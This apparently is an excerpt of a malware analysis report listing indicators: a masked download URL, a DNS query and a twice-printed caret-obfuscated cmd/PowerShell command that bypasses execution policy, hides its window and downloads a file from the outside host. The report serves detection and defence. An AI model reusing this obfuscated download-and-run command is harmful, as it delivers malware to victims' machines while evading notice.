Technical Information
- http://www.sa###ffpet.top/user.php?f=##### as %appdata%.exe
- DNS ASK sa###ffpet.top
- '<SYSTEM32>\cmd.exe' /c pow^er^s^heL^l.^eX^e -ex^ecut^iOnPoLIcY bYPass ^-^No^pRo^f^Ile ^-w^indo^w^s^tyL^e^ hi^ddeN^ (^New-^ObJec^t sy^s^tem.N^et.^weB^c^li^e^nt^).^dO^w^nLO^adfILe^('http://www.sa###ffpet....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c pow^er^s^heL^l.^eX^e -ex^ecut^iOnPoLIcY bYPass ^-^No^pRo^f^Ile ^-w^indo^w^s^tyL^e^ hi^ddeN^ (^New-^ObJec^t sy^s^tem.N^et.^weB^c^li^e^nt^).^dO^w^nLO^adfILe^('http://www.sa###ffpet....